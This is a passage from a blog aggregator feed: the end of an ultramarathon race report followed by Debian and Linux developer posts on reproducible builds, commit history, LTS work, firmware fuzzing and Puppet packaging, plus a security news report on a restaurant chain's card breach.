Trying to eat the solid food was difficult and slowing me down so I gave up by the time I hit the single track just before the stairs. I had a chat with a blonde woman (it may have been Daniela Burton) and it was her first 100 so I told her not to get discouraged how long the next leg (CP4 to CP5) takes and to keep focusing on moving forward. I also had a chat with Ben Grimshaw a few times on the way up Nellies as I was passed by him while trying to eat solid food and then caught him again on the stairs once I started pushing up there reasonably fast once more. We cruised through the single track at the top passing a few runners and got into CP4 pretty much together.

I had to refill my water bladder here as well as get two new bottles, still with Jane's help I got out of here fast and left by 6 hours 30 minutes on the race clock. Though behind Ben now as he was quicker in the CP. Now I was happy to hit my race goal of feeling pretty good at Katoomba and still being keen to run which is always the way I think you need to feel at this point as the next leg is the the crux of the race, the half marathon of stairs is really a tough mental and physical barrier to get through.

I headed along to echo point through some crowds on the walk way near the cliff edge and it was nice to have some of the tourists cheering us on, a few other runners were near by and we got through nicely. On the descent down the giant stair case I seemed to pass a few people pretty comfortably and then on to Dardanelle's pass and it was nice running through there for a while. Of course getting down to Leura forest we got to see some 50km runners coming the other way (a few asked me where I was going worried they had made a wrong turn, when I said I was a 100km runner they realised all was cool told me well done and kept going).

I caught Ben again on the way up the stairs from Leura forest and we were near each other a bit for a while then however I seemed to pull ahead on stairs a bit so over the next while I got away from him (he caught me later in the race anyway though). Last year I had a diabetic low blood sugar incident in this leg, somewhere just before the wentworth falls lookout carpark I think. So I was paying more attention through the day on constant calorie intake with lots of clif shot blocks and gu gels. I kept moving well enough through this whole leg so that turned out well. I Said hi to Graham (Hammond) who was cheering runners on at the Fairmont resort water station and ran on for a few more stairs.

Running in to CP 5 on king tableland road I still felt alright and managed to eat another three cubes of shot block there. I had run out of plain water (bladder) again so had not had a salt tablet for a little while. This year I had decided to run with more salt consumption and had bought hammer enduralyte salt tablets, I was downing 1 or 2 of them every time I ate all day which I think may have helped, though I still had cramps around Dunphys that happens every year and I knew I had run a bit hard early anyway (hoping to hit splits needed for sub 12). However even though it was a hot day and many people struggled more in the heat than other years I seemed to deal with it well. However I had discovered I struggled to down the tablets with electrolyte drink from my bottles (high 5 tablets, usually berry flavour) so I needed plain water from the camelback for them.

I got more food from Jane at CP5, re lubed myself a bit refilled the bladder and got moving. I also grabbed a second head torch, though I was carrying one already I liked the beam pattern more on the one I grabbed here, though with full water, bottles and the extra torch I felt pretty heavy running out of CP 5. Still just 3 hours to go now I expected. I got out of there at 9h25m on the race clock which was good, thus if I could have a good run through here I may be able to get in under 12h20m (2h50m run would be nice for this leg at this point). I got moving on the approach to the kedumba descent joking with a few others around me it was time to smash the quads and say good bye to them as they were no longer needed after this really. (only one short sort of descent to Leura creek) I was asked if we needed quads on the stairs, my response was they were a glute fest and allowed use of arms due to the railing so who needs quads after Kedumba.

However as I got on to the descent and passed under the overhang I noticed my legs were a bit off and I could not open up well, I thought about it and realised I was probably low on sugar and needed to eat, eating at this sort of downhill pace was a bit hard (especially as some food was making me feel like throwing up (gels)). I thought I would try to hang on until the bottom as I could walk up out of Jamisons creek eating. However I needed to slow to a walk just after passing the Mt Solitary turn off and down a gel. Then a few minutes later trying to run still did not work so I had to stop and walk and eat for a while again rather than descending at full speed. Doing all of that I was passed by a few people (I think the woman who came 5th, the guy I joked about not needing Quads with and a few others).

Oh well I should have eaten more while stopped at the CP or on the flat at the top, oops, lost time (in the results comparing with people I ran similar splits all day to I may have lost as much as 15 minutes here with this issue). Once I got onto the climb out of Jamisons creek I ate some more and focused on holding a reasonably strong hike, the people who passed me were long gone and I could not motivate myself to push hard to see if I would catch them or not. I was passing a number of 50km runners by this point (I think the sweep must have been at CP5 when I went through). They were fun to cheer on and chat with as I caught and passed them, getting down to Leura creek was good as it was still day light and I could get moving up there to the last aid and onto the finish before I thought about lights.

Ben caught me a gain here saying he had really pushed hard on the kedumba descent and he was looking good so sat a little ahead of me up to the aid station. I refilled my bottles and kept going chatting with 50 km runners as I passed them. I got to the poo farm a bit quicker than I expected (going on feeling as I was not looking at my watch much) however it was good to finally be up on Federal pass not long after that and this is where I decided to focus on moving fast. The last two years I crawled along here and I think I lost a lot of time, I know last year I had mentally given up so was crawling, the year before I think I was just a bit stuffed by then. This time I focused on running whenever it was not a steep up and on getting over to the stairs as quickly as possible.

It was still fun cheering on the 50km runners and chatting with them as I passed, I even saw some women in awesome pink outfits I had seen here a few weeks earlier while training so it was good to cheer them on, when I asked them about it they said it was them and they recognised me (it's pinky they exclaimed) as I passed. I got to the base of the stairs at 12:14 so knew I had to work hard to finish in under 12:30 but it was time to get that done if possible. On the climb up the stairs it felt like I was getting stuck behind 50km runners on many of the narrow sections of stairs however it probably was not much time slowing up the pace (one occasion a race doctor was walking up the stairs with a runner just to help them get to the finish). I managed to get across the finish line in 12:29:51 (57th overall) which was a good result all things considered.

Thanks go to Jane for coming up from Sydney and supporting me all day, Tom, Al and AROC for keeping the fun happening for all the runners, Dave and co for some excellent course markings, all the other AROC people and volunteers. David, Julie, Alex and others for company on lots of the training the last few months. I have a few ideas for what I need to work on next to faster on this course, however am thinking I may have a year off UTA100 to go do something else. The Hubert race in South Australia at the start of may looks like it could be awesome (running in the wilpena pound area through the Flinders ranges) and it will probably be good to develop my base and speed a bit more over time before my next attempt to see if I can become a runner (crack 12 hours on this course).

UTA100 really is the pinnacle of trail running in Australia with the level of competition, course fun quality, vibe on ocurse and the welcome to country, the event history and everything else so I hightly recommend it to anyone keen to challenge themselves. Even if so far this year the event that has really grabbed my attention the most is probably the Razorback Ultra, it is a very different day out to UTA100 so it is all good fun to get outdoors and enjoy the Australian wilderness.

Planet DebianReproducible builds folks: Improving the process for testing build reproducibility

Hi! I'm Ceridwen. I'm going to be one of the Outreachy interns working on Reproducible Builds for the summer of 2016. My project is to create a tool, tentatively named reprotest, to make the process of verifying that a build is reproducible easier.

The current tools and the Reproducible Builds site have limits on what they can test, and they're not very user friendly. (For instance, I ended up needing to edit the rebuild.sh script to run it on my system.) Reprotest will automate some of the busywork involved and make it easier for maintainers to test reproducibility without detailed knowledge of the process involved. A session during the Athens meeting outlines some of the functionality and command-line and configuration file API goals for reprotest. I also intend to use some ideas, and command-line and config processing boilerplate, from autopkgtest. Reprotest, like autopkgtest, should be able to interface with more build environments, such as schroot and qemu. Both autopkgtest and diffoscope, the program that the Reproducible Builds project uses to check binaries for differences, are written in Python, and as Python is the scripting language I'm most familiar with, I will be writing reprotest in Python too.

One of my major goals is to get a usable prototype released in the first three to four weeks. At that point, I want to try to solicit feedback (and any contributions anyone wants to make!). One experience I've had in open source software is that connecting people with software they might want to use is often the hardest part of a project. I've reimplemented existing functionality myself because I simply didn't know that someone else had already written something equivalent, and seen many other people do the same. Once I have the skeleton fleshed out, I'm going to be trying to find and reach out to any other communities, outside the Debian Reproducible Builds project itself, who might find reprotest useful.

,

Planet DebianMatthew Garrett: Your project's RCS history affects ease of contribution (or: don't squash PRs)

Github recently introduced the option to squash commits on merge, and even before then several projects requested that contributors squash their commits after review but before merge. This is a terrible idea that makes it more difficult for people to contribute to projects.

I'm spending today working on reworking some code to integrate with a new feature that was just integrated into Kubernetes. The PR in question was absolutely fine, but just before it was merged the entire commit history was squashed down to a single commit at the request of the reviewer. This single commit contains type declarations, the functionality itself, the integration of that functionality into the scheduler, the client code and a large pile of autogenerated code.

I've got some familiarity with Kubernetes, but even then this commit is difficult for me to read. It doesn't tell a story. I can't see its growth. Looking at a single hunk of this diff doesn't tell me whether it's infrastructural or part of the integration. Given time I can (and have) figured it out, but it's an unnecessary waste of effort that could have gone towards something else. For someone who's less used to working on large projects, it'd be even worse. I'm paid to deal with this. For someone who isn't, the probability that they'll give up and do something else entirely is even greater.

I don't want to pick on Kubernetes here - the fact that this Github feature exists makes it clear that a lot of people feel that this kind of merge is a good idea. And there are certainly cases where squashing commits makes sense. Commits that add broken code and which are immediately followed by a series of "Make this work" commits also impair readability and distract from the narrative that your RCS history should present, and Github present this feature as a way to get rid of them. But that ends up being a false dichotomy. A history that looks like "Commit", "Revert Commit", "Revert Revert Commit", "Fix broken revert", "Revert fix broken revert" is a bad history, as is a history that looks like "Add 20,000 line feature A", "Add 20,000 line feature B".

When you're crafting commits for merge, think about your commit history as a textbook. Start with the building blocks of your feature and make them one commit. Build your functionality on top of them in another. Tie that functionality into the core project and make another commit. Add client support. Add docs. Include your tests. Allow someone to follow the growth of your feature over time, with each commit being a chapter of that story. And never, ever, put autogenerated code in the same commit as an actual functional change.

People can't contribute to your project unless they can understand your code. Writing clear, well commented code is a big part of that. But so is showing the evolution of your features in an understandable way. Make sure your RCS history shows that, otherwise people will go and find another project that doesn't make them feel frustrated.

(Edit to add: Sarah Sharp wrote on the same topic a couple of years ago)

comment count unavailable comments

Planet DebianAntoine Beaupré: My free software activities, May 2016

Debian Long Term Support (LTS)

This is my 6th month working on Debian LTS, started by Raphael Hertzog at Freexian. This is my largest month so far, for which I had requested 20 hours of work.

Xen work

I spent the largest amount of time working on the Xen packages. We had to re-roll the patches because it turned out we originally just imported the package from Ubuntu as-is. This was a mistake because that package forked off the Debian packaging a while ago and included regressions in the packaging itself, not just security fixes.

So I went ahead and rerolled the whole patchset and tested it on Koumbit's test server. Brian May then completed the uploaded, which included about 40 new patches, mostly from Ubuntu.

Frontdesk duties

Next up was the frontdesk duties I had taken this week. This was mostly uneventful, although I had forgotten how to do some of the work and thus ended up doing extensive work on the contributor's documentation. This is especially important since new contributors joined the team! I also did a lot of Debian documentation work in my non-sponsored work below.

The triage work involved chasing around missing DLAs, triaging away OpenJDK-6 (for which, let me remind you, security support has ended in LTS), raised the question of Mediawiki maintenance.

Other LTS work

I also did a bunch of smaller stuff. Of importance, I can note that I uploaded two advisories that were pending from April: NSS and phpMyAdmin. I also reviewed the patches for the ICU update, since I built the one for squeeze (but didn't have time to upload before squeeze hit end-of-life).

I have tried to contribute to the NTP security support but that was way too confusing to me, and I have left it to the package maintainer which seemed to be on top of things, even if things mean complete chaos and confusion in the world of NTP. I somehow thought that situation had improved with the recent investments in ntpsec and ntimed, but unfortunately Debian has not switched to the ntpsec codebase, so it seems that the NTP efforts have diverged in three different projects instead of closing into a single, better codebase.

Future LTS work

This is likely to be my last month of work on LTS until September. I will try to contribute a few hours in June, but July and August will be very busy for me outside of Debian, so it's unlikely that I contribute much to the project during the summer. My backlog included those packages which might be of interest to other LTS contributors:

  • libxml2: no upstream fix, but needs fixing!
  • tiff{,3}: same mess
  • libgd2: maintainer contacted
  • samba regression: mailed bug #821811 to try to revive the effort
  • policykit-1: to be investigated
  • p7zip: same

Other free software work

Debian documentation

I wrote an detailed short guide to Debian package development, something I felt was missing from the existing corpus, which seems to be too focus in covering all alternatives. My guide is opinionated: I believe there is a right and wrong way of doing things, or at least, there are best practices, especially when just patching packages. I ended up retroactively publishing that as a blog post - now I can simply tag an item with blog and it shows up in the blog.

(Of course, because of a mis-configuration on my side, I have suffered from long delays publishing to Debian planet, so all the posts dates are off in the Planet RSS feed. This will hopefully be resolved around the time this post is published, but this allowed me to get more familiar with the Planet Venus software, as detailed in that other article.)

Apart from the guide, I have also done extensive research to collate information that allowed me to create workflow graphs of the various Debian repositories, which I have published in the Debian Release section of the Debian wiki. Here is the graph:

It helps me understand how packages flow between different suites and who uploads what where. This emerged after I realized I didn't really understand how "proposed updates" worked. Since we are looking at implementing a similar process for the security queue, I figured it was useful to show what changes would happen, graphically.

I have also published a graph that describes the relations between different software that make up the Debian archive. The idea behind this is also to provide an overview of what happens when you upload a package in the Debian archive, but it is more aimed at Debian developers trying to figure out why things are not working as expected.

The graphs were done with Graphviz, which allowed me to link to various components in the graph easily, which is neat. I also prefered Graphviz over Dia or other tools because it is easier to version and I don't have to bother (too much) about the layout and tweaking the looks. The downside is, of course, that when Graphviz makes the wrong decision, it's actually pretty hard to make it do the right thing, but there are various workarounds that I have found that made the graphs look pretty good.

The source is of course available in git but I feel all this documentation (including the guide) should go in a more official document somewhere. I couldn't quite figure out where. Advice on this would be of course welcome.

Ikiwiki

I have made yet another plugin for Ikiwiki, called irker, which enables wikis to send notifications to IRC channels, thanks to the simple irker bot. I had trouble with Irker in the past, since it was not quite reliable: it would disappear from channels and not return when we'd send it a notification. Unfortunately, the alternative, the KGB bot is much heavier: each repository needs a server-side, centralized configuration to operate properly.

Irker's design is simpler and more adapted to a simple plugin like this. Let's hope it will work reliably enough for my needs.

I have also suggested improvements to the footnotes styles, since they looked like hell in my Debian guide. It turns out this was an issue with the multimarkdown plugin that doesn't use proper semantic markup to identify footnotes. The proper fix is to enable footnotes in the default Discount plugin, which will require another, separate patch.

Finally, I have done some improvements (I hope!) on the layout of this theme. I made the top header much lighter and transparent to work around an issue where followed anchors would be hidden under the top header. I have also removed the top menu made out of the sidebar plugin because it was cluttering the display too much. Those links are all on the frontpage anyways and I suspect people were not using them so much.

The code is, as before, available in this git repository although you may want to start from the new ikistrap theme that is based on Bootstrap 4 and that may eventually be merged in ikiwiki directly.

DNS diagnostics

Through this interesting overview of various *ping tools, I got found out about the dnsdiag tool which currently allows users to do DNS traces, tampering detection and ping over DNS. In the hope of packaging it into Debian, I have requested clarifications regarding a modification to the DNSpython library the tool uses.

But I went even further and boldly opened a discussion about replacing DNSstuff, the venerable DNS diagnostic tools that is now commercial. It is somewhat surprising that there is no software that has even been publicly released that does those sanity checks for DNS, given how old DNS is.

Incidentally, I have also requested smtpping to be packaged in Debian as well but httping is already packaged.

Link checking

In the process of writing this article, I suddenly remembered that I constantly make mistakes in the various links I post on my site. So I started looking at a link checker, another tool that should be well established but that, surprisingly, is not quite there yet.

I have found this neat software written in Python called LinkChecker. Unfortunately, it is basically broken in Debian, so I had to do a non-maintainer upload to fix that old bug. I managed to force myself to not take over maintainership of this orphaned package but I may end up doing just that if no one steps up the next time I find issues in the package.

One of the problems I had checking links in my blog is that I constantly refer to sites that are hostile to bots, like the Debian bugtracker and MoinMoin wikis. So I published a patch that adds a --no-robots flag to be able to crawl those sites effectively.

I know there is the W3C tool but it's written in Perl, and there's probably zero chance for me to convince those guys to bypass robots exclusion rules, so I am sticking to Linkchecker.

Other Debian packaging work

At my request, Drush has finally been removed from Debian. Hopefully someone else will pick up that work, but since it basically needs to be redone from scratch, there was no sense in keeping it in the next release of Debian. Similarly, Semanticscuttle was removed from Debian as well.

I have uploaded new versions of tuptime, sopel and smokeping. I have also file a Request For Help for Smokeping. I am happy to report there was a quick response and people will be stepping up to help with the maintenance of that venerable monitoring software.

Background radiation

Finally, here's the generic background noise of me running around like a chicken with his head cut off:

Finally, I should mention that I will be less active in the coming months, as I will be heading outside as the summer finally came! I somewhat feel uncomfortable documenting publicly my summer here, as I am more protective of my privacy than I was before on this blog. But we'll see how it goes, maybe you'll hear non-technical articles here again soon!

Planet DebianSteve Kemp: Accidental data-store .. is go!

A couple of days ago I wrote::

The code is perl-based, because Perl is good, and available here on github:

..

TODO: Rewrite the thing in #golang to be cool.

I might not be cool, but I did indeed rewrite it in golang. It was quite simple, and a simple benchmark of uploading two million files, balanced across 4 nodes worked perfectly.

https://github.com/skx/sos/

Planet DebianValerie Young: Summer of Reproducible Builds

 

Hello friend, family, fellow Outreachy participants, and the Debian community!

This blog's primary purpose will be to track the progress of the Outreachy project in which I'm participating this summer 🙂  This post is to introduce myself and my project (working on the Debian reproducible builds project).

What is Outreachy? You might not know! Let me empower you: Outreachy is an organization connecting woman and minorities to mentors in the free (as in freedom) software community, /and/ funding for three months to work with the mentors and contribute to a free software project.  If you are a woman or minority human that likes free software, or if you know anyone in this situation, please tell them about Outreachy 🙂 Or put them in touch with me, I'd happily tell them more.

So who am I?

My name is Valerie Young. I live in the Boston Metropolitan Area (any other outreachy participants here?) and hella love free software. 

Some bullet pointed Val facts in rough reverse chronological order:
- I run Debian but only began contributing during the Outreachy application process
- If you went to DebConf2015, you might have seen me dye nine people's hair blue, blond or Debian swirl.
- If you stop through Boston I could be easily convinced to dye your hair.
- I worked on electronic medical records web application for the last two years (lotsa Javascriptin' and Perlin' at athenahealth)
- Before that I taught a programming summer program at University of Moratuwain Sri Lanka.
- Before that I got a degrees in physics and computer science at Boston University.
- At BU I helped start a hackerspace where my interest in technology, free software, hacker culture, anarchy, the internet all began.
- I grew up in the very fine San Francisco Bay Area.

What will I be working on?

Reproducible builds!

In the near future I'll write a “What is reproducible builds? Why is it so hot right now?” post.  For now, from a high (and not technical) level, reproducible builds is a broad effort to verify that the computer executable binary programs you run on your computer come from the human readable source code they claim to. It is not presently /impossible/ to do this verification, but it's not easy, and there are a lot of nuanced computer quirks that make it difficult for the most experienced programmer and straight-up impossible for a user with no technical expertise. And without this ability to verify -- the state we are in now -- any executable piece of software could be hiding secret code. 

The first step towards the goal of verifiability is to make reproducibility a essential part of software development. Reproducible builds means this: when you compile a program from the source code, it should always be identical, bit by bit. If the program is always identical, you can compare your version of the software to any trusted programmer with very little effort. If it is identical, you can trust it -- if it's not, you have reason to worry.

The Debian project is undergoing an effort to make the entire Debian operating system verifiable reproducible (hurray!). My outreachy-funded summer contribution involves the improving and updating tests.reproducible-builds.org – a site that presently presently surfaces the results of reproducibility testing of several free software projects (including Debian, Fedora, coreboot, OpenWrt, NetBSD, FreeBSD and ArchLinux). However, the design of test.r-b.org is a bit confusing, making it difficult for a user to find how to check on the reproducibility of a given package for one of the aforementioned projects, or understand the reasons for failure. Additional, the backend test results of Debian are outgrowing the original SQLite database, and many projects do not log the results of package testing at all. I hope, by the end of the summer, we'll have a more beefed-out and pretty site as well as better organized backend data 🙂

This summer there will be 3 other Outreachy participants working on the Debian reproducible builds project! Check out their blogs/projects:
Scarlett
Satyam
Ceridwen

Thanks to our Debian mentors -- Lunar, Holger Levsen, and Mattia Rizzolo -- for taking us on 🙂 

 

Planet DebianMichal Čihař: wlc 0.3

wlc 0.3, a command line utility for Weblate, has been just released. This is probably first release which is worth using so it's probably also worth of bigger announcement.

It is built on API introduced in Weblate 2.6 and still being in development. Several commands from wlc will not work properly if executed against Weblate 2.6, first fully supported version will be 2.7 (current git is okay as well, it is now running on both demo and hosting servers).

How to use it? First you will probably want to store the credentials, so that your requests are authenticated (you can do unauthenticated requests as well, but obviously only read only and on public objects), so lets create ~/.config/weblate:

[weblate]
url = https://hosted.weblate.org/api/

[keys]
https://hosted.weblate.org/api/ = APIKEY

Now you can do basic commands:

$ wlc show weblate/master/cs
...
last_author: Michal Čihař
last_change: 2016-05-13T15:59:25
revision: 62f038bb0bfe360494fb8dee30fd9d34133a8663
share_url: https://hosted.weblate.org/engage/weblate/cs/
total: 1361
total_words: 6144
translate_url: https://hosted.weblate.org/translate/weblate/master/cs/
translated: 1361
translated_percent: 100.0
translated_words: 6144
url: https://hosted.weblate.org/api/translations/weblate/master/cs/
web_url: https://hosted.weblate.org/projects/weblate/master/cs/

You can find more examples in wlc documentation.

Filed under: Debian English phpMyAdmin SUSE Weblate | 0 comments

Planet Linux AustraliaGary Pendergast: Introducing: Linkify for Chrome

In WordPress 4.2, a fun little feature was quietly snuck into Core, I’m always delighted to see people’s reactions when they discover it.

But there’s still a problem – WordPress is only ~26% of the internet, how can you get the same feature on the other 74%? Well, that problem has now been rectified. Introducing, Linkify for Chrome:

Thank you to Davide for creating Linkify’s excellent icon!

Linkify is a Chrome extension to automatically turn a pasted URL into a link, just like you’re used to in WordPress. It also supports Trac and Markdown-style links, so you can paste links on your favourite bug trackers, too.

Speaking of bug trackers, if there are any other link formats you’d like to see, post a ticket over on the Linkify GitHub repo!

Oh, and speaking of Chrome extensions, you might be like me, and find the word “emojis” to be extraordinarily awkward. If so, I have another little extension, just for you.

Planet DebianPetter Reinholdtsen: I want the courts to be involved before the police can hijack a news site DNS domain (#domstolkontroll)

I just donated to the NUUG defence "fond" to fund the effort in Norway to get the seizure of the news site popcorn-time.no tested in court. I hope everyone that agree with me will do the same.

Would you be worried if you knew the police in your country could hijack DNS domains of news sites covering free software system without talking to a judge first? I am. What if the free software system combined search engine lookups, bittorrent downloads and video playout and was called Popcorn Time? Would that affect your view? It still make me worried.

In March 2016, the Norwegian police seized (as in forced NORID to change the IP address pointed to by it to one controlled by the police) the DNS domain popcorn-time.no, without any supervision from the courts. I did not know about the web site back then, and assumed the courts had been involved, and was very surprised when I discovered that the police had hijacked the DNS domain without asking a judge for permission first. I was even more surprised when I had a look at the web site content on the Internet Archive, and only found news coverage about Popcorn Time, not any material published without the right holders permissions.

The seizure was widely covered in the Norwegian press (see for example Hegnar Online and ITavisen and NRK), at first due to the press release sent out by Økokrim, but then based on protests from the law professor Olav Torvund and lawyer Jon Wessel-Aas. It even got some coverage on TorrentFreak.

I wrote about the case a month ago, when the Norwegian Unix User Group (NUUG), where I am an active member, decided to ask the courts to test this seizure. The request was denied, but NUUG and its co-requestor EFN have not given up, and now they are rallying for support to get the seizure legally challenged. They accept both bank and Bitcoin transfer for those that want to support the request.

If you as me believe news sites about free software should not be censored, even if the free software have both legal and illegal applications, and that DNS hijacking should be tested by the courts, I suggest you show your support by donating to NUUG.

Krebs on SecurityNoodles & Company Probes Breach Claims

Noodles & Company [NASDAQ: NDLS]a fast-casual restaurant chain with more than 500 stores in 35 U.S. states, says it has hired outside investigators to probe reports of a credit card breach at some locations.

noodlesOver the past weekend, KrebsOnSecurity began hearing from sources at multiple financial institutions who said they’d detected a pattern of fraudulent charges on customer cards that were used at various Noodles & Company locations between January 2016 and the present.

Asked to comment on the reports, Broomfield, Colo.-based Noodles & Company issued the following statement:

“We are currently investigating some unusual activity reported to us Tuesday, May 16, 2016 by our credit card processor. Once we received this report, we alerted law enforcement officials and we are working with third party forensic experts. Our investigation is ongoing and we will continue to share information.”

The investigation comes amid a fairly constant drip of card breaches at main street retailers, restaurant chains and hospitality firms. Wendy’s reported last week that a credit card breach that began in the autumn of 2015 impacted 300 of its 5,500 locations.

Cyber thieves responsible for these attacks use security weaknesses or social engineering to remotely install malicious software on retail point-of-sale systems. This allows the crooks to read account data off a credit or debit card’s magnetic stripe in real time as customers are swiping them at the register.

U.S. banks have been transitioning to providing customers more secure chip-based credit and debit cards, and a greater number of retailers are installing checkout systems that can read customer card data off the chip. The chip encrypts the card data and makes it much more difficult and expensive for thieves to counterfeit cards.

However, most of these chip cards will still hold customer data in plain text on the card’s magnetic stripe, and U.S. merchants that continue to allow customers to swipe the stripe or who do not have chip card readers in place face shouldering all of the liability for any transactions later determined to be fraudulent.

While a great many U.S. retail establishments have already deployed chip-card readers at their checkout lines, relatively few have enabled those readers, and are still asking customers to swipe the stripe. For its part, Noodles & Company says it’s in the process of testing and implementing chip-based readers.

“The ongoing program we have in place to aggressively test and implement chip-based systems across our network is moving forward,” the company said in a statement. “We are actively working with our key business partners to deploy this system as soon as they are ready.”

Worse Than FailureCoded Smorgasbord: A Spiritual Journey

Hold your souls tightly, for today, we pierce the veil into the great beyond. We shall examine existential questions and commune with spirits. We shall learn what eternity holds for us all.

First, we must bring ourselves to the edge of death, into a liminal state where time does not pass, where the conscious mind takes a back-seat to the spiritual realm. Mark found this C# code to do the job:

    if (Thread.CurrentThread.ThreadState != ThreadState.Running)
        return false;

Are we alive? Are we dead? What is this darkness? Where are we? Surely, we must now find our path. Many languages, like Python, have useful libraries to help us parse out and understand the structure of our path. Chris sent us this code, which eschews the well traveled os.path library, and reinvents that wheel:

    samp = file[file.find('intFiles')+9:].split("/")[0]
    fName = file.split("/")[-1]

This code pulls off the portion of the path that occurs after intFiles, and splits off the last portion, which we hope is a filename. Now, with that filename, the collective sin on our souls must be weighed, and our eternal reward- or punishment- will be delivered.

Brandon knows what the afterlife holds for us all… welcome to hell:

If Error=0 Then
    Error = DeleteSummaryTables(Conn, sJobId, "Summary_Grips")
    If Error = 0 Then
        Error = DeleteSummaryTables(Conn, sJobId, "Summary_GroundType")
        If Error = 0 Then
            Error = DeleteSummaryTables(Conn, sJobId, "Summary_Enviroment")
            If Error = 0 Then
                Error = DeleteSummaryTables(Conn, sJobId, "Summary_FloorType")
                If Error = 0 Then
                    Error = DeleteSummaryTables(Conn, sJobId, "Summary_Control")
                    If Error = 0 Then
                        Error = DeleteSummaryTables(Conn, sJobId, "Summary_HandToolType")
                        If Error = 0 Then
                            Error = DeleteSummaryTables(Conn, sJobId, "Summary_FingerMovement")
                            If Error = 0 Then
                                Error = DeleteSummaryTables(Conn, sJobID, "Summary_LiftHeights")
                                If Error = 0 Then
                                    Conn.CommitTrans
                                Else
                                    DisplayError "Error deleting record from the Summary_LiftHeights tables.", err.number, err.Description
                                    Conn.RollbackTrans
                                End If
                            Else
                                DisplayError "Error deleting record from the Summary_FingerMovement tables.", err.number, err.Description
                                Conn.RollbackTrans
                            End If
                        Else
                            DisplayError "Error deleting record from the Summary_HandToolType tables.", err.number, err.Description
                            Conn.RollbackTrans
                        End If
                    Else
                        DisplayError "Error deleting record from the Summary_Control tables.", err.number, err.Description
                        Conn.RollbackTrans
                    End If
                Else
                    DisplayError "Error deleting record from the Summary_FloorType tables.", err.number, err.Description
                    Conn.RollbackTrans
                End If
            Else
                DisplayError "Error deleting record from the Summary_Enviroment tables.", err.number, err.Description
                Conn.RollbackTrans
            End If
        Else
            DisplayError "Error deleting record from the Summary_GroundType tables.", err.number, err.Description
            Conn.RollbackTrans
        End If
    Else
        DisplayError "Error deleting record from the Summary_Grips tables.", err.number, err.Description
        Conn.RollbackTrans
    End If
Else
    DisplayError "Error deleting record from the Summary_Grips tables.", err.number, err.Description
    Conn.RollbackTrans
End If
    Else
    DisplayError "Error deleting record from the JobHeader_WorkAReas tables.", err.number, err.Description
    Conn.RollbackTrans
    End If
    Else
        DisplayError "Error deleting record from the Tasks tables.", err.number, err.Description
        Conn.RollbackTrans
    End If
    Else
        DisplayError "Error deleting record from the subtask tables.", err.number, err.Description
        Conn.RollbackTrans
    End If
End If
[Advertisement] Manage IT infrastructure as code across all environments with Puppet. Puppet Enterprise now offers more control and insight, with role-based access control, activity logging and all-new Puppet Apps. Start your free trial today!

Rondam RamblingsCould Trump be broke?

One of the big mysteries of Donald Trump's run for the White House is: why would he do it?  It seems like an awful lot of bother even for a self-aggrandizing narcissist like Trump.  And being the President is actually kind of a sucky job.  Yeah, you get a nice airplane out of it, but Trump already has a nice airplane (actually, several nice airplanes and a helicopter).  The White House would

,

Planet Linux AustraliaStewart Smith: Fuzzing Firmware – afl-fuzz + skiboot

In what is likely to be a series on how firmware makes some normal tools harder to use, first I’m going to look at american fuzzy lop – a tool for fuzz testing that if you’re not using then you most certainly have bugs it’ll find for you.

I first got interested in afl-fuzz during Erik de Castro Lopo’s excellent linux.conf.au 2016 in Geelong earlier this year: “Fuzz all the things!“. In a previous life, the Random Query Generator managed to find a heck of a lot of bugs in MySQL (and Drizzle). For randgen info, see Philip Stoev’s talk on it from way back in 2009, a recent (2014) blog post on how Tokutek uses it and some notes on how it was being used at Oracle from 2013. Basically, the randgen was a specialized fuzzer that (given a grammar) would randomly generate SQL queries, and then (if the server didn’t crash), compare the result to some other database server (e.g. your previous version).

The afl-fuzz fuzzer takes a different approach – it’s a much more generic fuzzer rather than a targeted tool. Also, while tools such as the random query generator are extremely powerful and find specialized bugs, they’re hard to get started with. A huge benefit of afl-fuzz is that it’s really, really simple to get started with.

Basically, if you have a binary that takes input on stdin or as a (relatively small) file, afl-fuzz will just work and find bugs for you – read the Quick Start Guide and you’ll be finding bugs in no time!

For firmware of course, we’re a little different than a simple command line program as, well, we aren’t one! Luckily though, we have unit tests. These are just standard binaries that include a bunch of firmware code and get run in user space as part of “make check”. Also, just like unit tests for any project, people do send me patches that break tests (which I reject).

Some of these tests act on data we get from a place – maybe reading other parts of firmware off PNOR or interacting with data structures we get from other bits of firmware. For testing this code, it can be relatively easy to (for the test), read these off disk.

For skiboot, there’s a data structure we get from the service processor on FSP machines called HDAT. Basically, it’s just like the device tree, but different. Because yet another binary format is always a good idea (yes, that is laced with a heavy dose of sarcasm). One of the steps in early boot is to parse the HDAT data structure and convert it to a device tree. Luckily, we structured our code so that creating a unit test that can run in userspace was relatively easy, we just needed to dump this data structure out from a running machine. You can see the test case here. Basically, hdat_to_dt is a binary that reads the HDAT structure out of a pair of files and prints out a device tree. One of the regression tests we have is that we always produce the same output from the same input.

So… throwing that into AFL yielded a couple of pretty simple bugs, especially around aborting out on invalid data (it’s better to exit the process with failure rather than hit an assert). Nothing too interesting here on my simple input file, but it does mean that our parsing code exits “gracefully” on invalid data.

Another utility we have is actually a userspace utility for accessing the gard records in the flash. A GARD record is a record of a piece of hardware that has been deconfigured due to a fault (or a suspected fault). Usually this utility operates on PNOR flash through /dev/mtd – but really what it’s doing is talking to the libflash library, that we also use inside skiboot (and on OpenBMC) to read/write from flash directly, via /dev/mtd or just from a file. The good news? I haven’t been able to crash this utility yet!

So I modified the pflash utility to read from a file to attempt to fuzz the partition reading code we have for the partitioning format that’s on PNOR. So far, no crashes – although to even get it going I did have to fix a bug in the file handling code in pflash, so that’s already a win!

But crashing bugs aren’t the only type of bugs – afl-fuzz has exposed several cases where we act on uninitialized data. How? Well, we run some test cases under valgrind! This is the joy of user space unit tests for firmware – valgrind becomes a tool that you can run! Unfortunately, these bugs have been sitting in my “todo” pile (which is, of course, incredibly long).

Where to next? Fuzzing the firmware calls themselves would be nice – although that’s going to require a targeted tool that knows about what to pass each of the calls. Another round of afl-fuzz running would also be good, I’ve fixed a bunch of the simple things and having a better set of starting input files would be great (and likely expose more bugs).

Planet DebianStig Sandbeck Mathisen: Puppet 4 uploaded to Debian experimental

I’ve uploaded puppet 4.4.2-1 to Debian experimental.

Please test with caution, and expect sharp corners. This is a new major version of Puppet in Debian, with many new features and potentially breaking changes, as well as a big rewrite of the .deb packaging. Bug reports for src:puppet are very welcome.

As previously described in #798636, the new package names are:

  • puppet (all the software)

  • puppet-agent (package containing just the init script and systemd unit for the puppet agent)

  • puppet-master (init script and systemd unit for starting a single master)

